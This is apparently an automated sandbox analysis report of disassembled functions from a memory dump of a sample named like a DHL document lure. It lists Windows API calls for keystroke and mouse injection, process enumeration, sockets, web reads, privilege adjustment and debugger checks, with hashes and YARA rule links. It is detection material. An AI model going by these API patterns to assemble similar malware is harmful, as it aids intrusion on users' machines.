Opcode ID: 57f09f53f8d37f6f4c4c0f0068f32b774f68dfa9ef51e231f5d5adf96f5f8d3b
Instruction ID: 9f98ecc8430bec910c7e4ddca0fe9472fc3c710ba4f0e1d05ef24a4c1c44b0f2
Opcode Fuzzy Hash: 57f09f53f8d37f6f4c4c0f0068f32b774f68dfa9ef51e231f5d5adf96f5f8d3b
Instruction Fuzzy Hash: 9AC25B71E046288FDB25CE29ED407EAB7B5EB49304F9441EBD80DE7241E778AE858F44

Function 0046648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004664DC
CoInitialize.OLE32(00000000), ref: 00466639
CoCreateInstance.OLE32(0048FCF8,00000000,00000001,0048FB68,?), ref: 00466650
CoUninitialize.OLE32 ref: 004668D4

Strings

.lnk, xrefs: 004664BA, 00466524, 004665E0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 0f634a148a2f86ebbef46cdd035cf96e43b4cb37b875b9cd21bfe8c884d0188e
Instruction ID: 544f2e9c5ba4d62641fb1384c23f6a27287910d558277ae8ff04f6961c76a7db
Opcode Fuzzy Hash: 0f634a148a2f86ebbef46cdd035cf96e43b4cb37b875b9cd21bfe8c884d0188e
Instruction Fuzzy Hash: CFD13B71508305AFC315EF24C881A6BB7E8FF94704F10496EF5968B291EB70ED09CB96

Function 004722DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 004722E8

Part of subcall function 0046E4EC: GetWindowRect.USER32(?,?), ref: 0046E504

GetDesktopWindow.USER32 ref: 00472312
GetWindowRect.USER32(00000000), ref: 00472319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00472355
GetCursorPos.USER32(?), ref: 00472381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004723DF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: d930e5ebabfe6f81e6c3f276db9466b5ba2dd3f55f7327bde70931a7da8b89c6
Instruction ID: 4ebbe1750ddf0d327e488d734bfbf524c847558f4c8d117f375eb37fdfc70295
Opcode Fuzzy Hash: d930e5ebabfe6f81e6c3f276db9466b5ba2dd3f55f7327bde70931a7da8b89c6
Instruction Fuzzy Hash: 7D31F272104315AFC720DF25D844B9BB7E9FF84314F00492EF88897281DB78EA08CB96

Function 00469B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00469B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00469C8B

Part of subcall function 00463874: GetInputState.USER32 ref: 004638CB
Part of subcall function 00463874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00463966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00469BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00469C75

Strings

*.*, xrefs: 00469B5D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 8a0b67bbeb132cd8e9979c09b011ffa947255f71ed46c23db5128e03076b4e77
Instruction ID: 605820135f6e4bb26281a564a982cc7f3169087bf829ca9f425a8473167c9def
Opcode Fuzzy Hash: 8a0b67bbeb132cd8e9979c09b011ffa947255f71ed46c23db5128e03076b4e77
Instruction Fuzzy Hash: 6B417F7190420A9FDF15DF64C989AEE7BF8EF05310F20405BE805A6291EB749E84CF6A

Function 0040997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00409A4E
GetSysColor.USER32(0000000F), ref: 00409B23
SetBkColor.GDI32(?,00000000), ref: 00409B36

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 255f11b65ea05ff0ccb40c060c0824838551a0905ea3f90e13c05c86a674f6eb
Instruction ID: fe04ec96ec62c6ec10359c0861c373e3e924334048731d7f3ab06f440e2ecc91
Opcode Fuzzy Hash: 255f11b65ea05ff0ccb40c060c0824838551a0905ea3f90e13c05c86a674f6eb
Instruction Fuzzy Hash: ECA1E670209484BAF624AA298C88E7F365DDB86354B15412FF502E67D3CB3DAD03D67E

Function 00471806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0047304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0047307A
Part of subcall function 0047304E: _wcslen.LIBCMT ref: 0047309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047185D
WSAGetLastError.WSOCK32 ref: 00471884
bind.WSOCK32(00000000,?,00000010), ref: 004718DB
WSAGetLastError.WSOCK32 ref: 004718E6
closesocket.WSOCK32(00000000), ref: 00471915

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 4a76c07dee760ba808fb0e6bb1512822a1ea7de1044e92f4c6c24762e0839ca0
Instruction ID: 2b66ff318420502d6065df80f90cefed1c7187256b00712b770aa750e8223089
Opcode Fuzzy Hash: 4a76c07dee760ba808fb0e6bb1512822a1ea7de1044e92f4c6c24762e0839ca0
Instruction Fuzzy Hash: 7251B271A00204AFDB11AF24C886F7AB7E5AB45718F04845DFA096F3D3C775AD41CBA5

Function 00481C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00481CC0
IsWindowEnabled.USER32 ref: 00481CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00481CDB
IsIconic.USER32 ref: 00481CE9
IsZoomed.USER32 ref: 00481CF7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 43b3107eb9a0fb2402aa5f89bf8c8e2a93d2a52040e2b68959509aed08aa0b71
Instruction ID: cb59bca5fa3370ec20a06173ddb98f7430e66aee87a01861c9bfe6da02e3ceee
Opcode Fuzzy Hash: 43b3107eb9a0fb2402aa5f89bf8c8e2a93d2a52040e2b68959509aed08aa0b71
Instruction Fuzzy Hash: AF21B4317402115FD721AF1AD884B2F7BE9AF95314B18886EE8468B361C775EC43CB98

Function 003F8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 003F813C
VUUU, xrefs: 003F843C
VUUU, xrefs: 00435DF0
VUUU, xrefs: 003F83FA
VUUU, xrefs: 003F83E8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 302623c617b9e85ab75d08a724f8ebebefb1456bd98590e8becfc5fa74e050d5
Instruction ID: 59be4759370dc74c725c7f11e24838bcf50dbe6cbddb6555d6b33b418d5d2621
Opcode Fuzzy Hash: 302623c617b9e85ab75d08a724f8ebebefb1456bd98590e8becfc5fa74e050d5
Instruction Fuzzy Hash: 70A28D70A0061ACBDF29CF58C8407BEB7B1BF58314F2585AAD915AB385DB389D81CF94

Function 00458298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004582AA

Strings

(, xrefs: 004582F0
|, xrefs: 004582DA
tbK, xrefs: 004584F4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: lstrlen
String ID: ($tbK$|
API String ID: 1659193697-3035244722
Opcode ID: 3d73df0d97b16047a2d20a8031742690553175db64ab65c4ae3adabf19b94e06
Instruction ID: a749ba32bf1c48e4820b0c0c85f79d3dda02e75221c8cfa9d47329a3178a22ca
Opcode Fuzzy Hash: 3d73df0d97b16047a2d20a8031742690553175db64ab65c4ae3adabf19b94e06
Instruction Fuzzy Hash: 0E323775A00605DFCB28CF19C48196AB7F0FF48710B15C46EE89AEB7A2EB74E941CB44

Function 0047A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0047A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0047A6BA

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0047A79C
CloseHandle.KERNEL32(00000000), ref: 0047A7AB

Part of subcall function 0040CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00433303,?), ref: 0040CE8A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: ebdfa3bdb29d416268b18563823720d83442325c9265d9da849d77e76d7243ef
Instruction ID: 6aefa082078bfe665e11c855dec7822fee06fda605e69b5183af7871881dff64
Opcode Fuzzy Hash: ebdfa3bdb29d416268b18563823720d83442325c9265d9da849d77e76d7243ef
Instruction Fuzzy Hash: BC515F71508304AFD711EF25C886A6FBBE8FF89754F00892EF58997291EB34D904CB96

Function 0045AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0045AAAC
SetKeyboardState.USER32(00000080), ref: 0045AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0045AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0045AB88

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 70749057ce740205606b89895c35752b268609b9ac83b77a0d3a5f811afb8811
Instruction ID: 5c52e394d77e22c0e1a1972649df64fffb4e2e483fb32a6108cccae0d2bed7d0
Opcode Fuzzy Hash: 70749057ce740205606b89895c35752b268609b9ac83b77a0d3a5f811afb8811
Instruction Fuzzy Hash: 58310C30A40204AEEB35CA658C05BFF77A6AB44312F04431BFA81562D2D37D9969C7EB

Function 0046CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0046CE89
GetLastError.KERNEL32(?,00000000), ref: 0046CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0046CEFE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: d36118a6de63b8d520e21f09d2d8292e317fdb617fbac2b39557cf70651f1d74
Instruction ID: 6fd69dbb596f1f976382928fde943bb4333567920b32ea4666cac933a7999b1c
Opcode Fuzzy Hash: d36118a6de63b8d520e21f09d2d8292e317fdb617fbac2b39557cf70651f1d74
Instruction Fuzzy Hash: E821B2719003059BD720DF65C984BAB77FCEB10314F10482FE686D2291E779ED45CB69

Function 0045DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00435222), ref: 0045DBCE
GetFileAttributesW.KERNEL32(?), ref: 0045DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0045DBEE
FindClose.KERNEL32(00000000), ref: 0045DBFA

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 9b4cfc1f2f108bfd37e059a3daacab74004c0a61c5395bfbef9206cfb4b92472
Instruction ID: a12e49bfc9c91cfecaf82d6b2d8c5e717d72b169da443c5135c3dcde2ff8c83f
Opcode Fuzzy Hash: 9b4cfc1f2f108bfd37e059a3daacab74004c0a61c5395bfbef9206cfb4b92472
Instruction Fuzzy Hash: DDF0A030C109109782316B78AC8D8AF37AC9E01336B144B5BF836C21E1EBB4595986AE

Function 00422622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0042271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00422724
UnhandledExceptionFilter.KERNEL32(?), ref: 00422731

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 0d304f03596e4d5eb0b7a0a34993804052941f3421d234722ad39ed024f0e480
Instruction ID: a219e0aa2b12b8eff35b4e9a5af7fad123db0344c0a59a8cfae10b5d186c1ea6
Opcode Fuzzy Hash: 0d304f03596e4d5eb0b7a0a34993804052941f3421d234722ad39ed024f0e480
Instruction Fuzzy Hash: B931D57490122CABCB21DF65DD887DDB7B8AF08310F5041EAE81CA7260E7749F818F48

Function 004651CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004651DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00465238
SetErrorMode.KERNEL32(00000000), ref: 004652A1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 65e26a30c835de6280913aca387dbe72f1be27685affd2438c9dab49288f6ce7
Instruction ID: 0c60eb07c959b8bb812f03c6380b55dee195be3a269290e41cfac98c7708905e
Opcode Fuzzy Hash: 65e26a30c835de6280913aca387dbe72f1be27685affd2438c9dab49288f6ce7
Instruction Fuzzy Hash: B9317C35A00608DFDB00DF54D8C4EAEBBB4FF08314F048099E905AB3A2DB35E846CBA5

Function 004516C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0040FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00410668
Part of subcall function 0040FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00410685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0045173A
GetLastError.KERNEL32 ref: 0045174A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 679e37e3aaa0c05e7a328d229f825f327d2f8c6afed669fbc7ad11a2e0af503c
Instruction ID: 4e3e112dad5569d58963b8b6194e21b65dec5edb4a65ef0a4a1e6011dd9a7cf5
Opcode Fuzzy Hash: 679e37e3aaa0c05e7a328d229f825f327d2f8c6afed669fbc7ad11a2e0af503c
Instruction Fuzzy Hash: F111EFB2400204AFD7289F68ECC6E6FB7B9EF44715B20843FE45652291EB74BC458B68

Function 0045D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0045D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0045D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0045D650

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b5368b7af9eec359d5c1aca2cf5a200254bd02e3db8d405cc8d4af58dcdc8c46
Instruction ID: dda51014a2934f11b5369cfc33c8ed6cda2a95b3ce8a91c234a9fdf8444eb139
Opcode Fuzzy Hash: b5368b7af9eec359d5c1aca2cf5a200254bd02e3db8d405cc8d4af58dcdc8c46
Instruction Fuzzy Hash: AA117C71E01228BBDB208F949C84FAFBBBCEB45B50F108126F904E7290C2704A05CBA5

Function 00451663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0045168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 004516A1
FreeSid.ADVAPI32(?), ref: 004516B1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: dbde4c0c343be2ce7c4a84ef4441a9086e54854892bf035656b246b95745d3ea
Instruction ID: f748b6454c4edb8ccf528cd1b0b120cdca00f2cc78586caea6f348348ebef68e
Opcode Fuzzy Hash: dbde4c0c343be2ce7c4a84ef4441a9086e54854892bf035656b246b95745d3ea
Instruction Fuzzy Hash: 37F04471940308FBDB00CFE09C89EAEBBBCEB08240F104865E900E2181E334AA048B64

Function 00414CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(004228E9,?,00414CBE,004228E9,004B88B8,0000000C,00414E15,004228E9,00000002,00000000,?,004228E9), ref: 00414D09
